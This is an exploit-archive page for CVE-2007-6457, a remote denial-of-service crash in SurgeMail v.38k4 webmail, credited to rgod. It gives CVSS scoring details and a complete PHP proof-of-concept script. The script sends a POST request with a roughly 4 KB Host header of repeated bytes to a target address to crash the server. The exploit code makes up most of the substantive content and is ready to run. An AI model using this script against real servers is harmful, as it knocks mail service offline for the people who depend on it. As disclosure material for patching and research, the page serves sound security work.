SurgeMail v.38k4 webmail Host header crash

2007.12.20

Credit: rgod

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-6457

CWE: CWE-119

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

<?php
/*
SurgeMail v.38k4 webmail Host header denial of service exploit
tested against the windows version
rgod
*/
dl("php_curl.so");
$url = "http://192.168.0.1";
$puf=str_repeat(0xff,0xfff);
$header ="POST / HTTP/1.0\r\n";
$header.="Host: $puf\r\n";
$header.="Connection: Close\r\n\r\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."\n";
} else {
curl_close($ch);
}
?>
original url: http://retrogod.altervista.org/rgod_surgemail_crash.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SurgeMail v.38k4 webmail Host header crash

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.